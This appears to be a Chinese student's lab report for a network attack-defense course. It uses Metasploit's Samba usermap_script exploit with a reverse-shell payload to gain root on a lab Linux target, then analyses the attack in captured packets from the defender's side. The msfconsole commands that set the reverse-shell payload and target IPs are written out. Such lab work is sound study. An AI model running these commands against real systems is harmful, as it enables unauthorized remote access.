20212935 2021-2022-2 《网络攻防实践》 第七次实践

1 实验目的
熟悉linux系统,学会远程渗透攻击。
2 实验环境
Kali、Me-ubuntu。
3 实验内容
3.1 使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
(1)启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
(2)使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
(3)选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
(4)设置渗透攻击参数(RHOST,LHOST,TARGET等);
(5)执行渗透攻击;
(6)查看是否正确得到远程Shell,并查看获得的权限。
3.2 攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
4 实验过程
4.1 使用Metasploit进行Linux远程渗透攻击:
(1)kali中输入命令行msfconsole进入启动msfconsole:

(2)输入命令行use exploit/multi/samba/usermap_script使用渗透攻击模块:

(3)输入命令行set PAYLOAD cmd/unix/reverse,使得攻击的PAYLOAD为cmd/unix/reverse:

(4)输入命令行set RHOST 192.11.137,使得靶机地址为Me-ubuntu的IP地址,然后执行run命令开始攻击,可正确得到远程shell命令:

(5)依次输入shell、ls命令,再通过whoami命令查看当前权限账户:

4.2 攻防对抗实践
4.2.1 作为攻击方
(1)选择攻击Linux靶机上的Samba服务Usermap_script安全漏洞。
(2)依次输入命令行msfconsole、use exploit/multi/samba/usermap_script、set PAYLOAD cmd/unix/reverse,并执行set RHOST 192.168.11.133命令设攻击对象的IP地址:

(3)执行run命令进行攻击,得到远程shell:

(4)按提示依次输入shell命令、python命令,然后使用exit()命令退出,输入whoami命令获得root权限:

4.2.2 作为防守方
(1)通过分析抓包到的数据,可以发现攻击方为192.168.11.145,我的防守方IP为192.168.11.137:

(2)如下可以看到目标IP端口是139,攻击时间是从第20个数据包开始尝试连接被攻击方的139端口:

(3)由139端口可知,攻击利用的是Linux靶机上的Samba服务Usermap_script安全漏洞。
(4)查看此条数据包,追踪其TCP数据流可以发现使用的shellcode:

(5)追踪最后一条数据包的TCP流可得攻击者攻击后又执行的命令为ifconfig:

5 实验中遇到的问题及解决方法
当作防守方时,分析抓包到的数据,发现找不到攻击者攻击后又输入的命令,交流后得知攻击完确实没有执行任何命令,于是又进行了一次攻击,再次分析后可以找到执行的命令了。
6 实验感想
通过这一次内容丰富的实验,我对Linux远程渗透攻击有了更深的了解。

posted @ 2022-04-25 21:07  dou嘚嘚嘚  阅读(45)  评论(0编辑  收藏  举报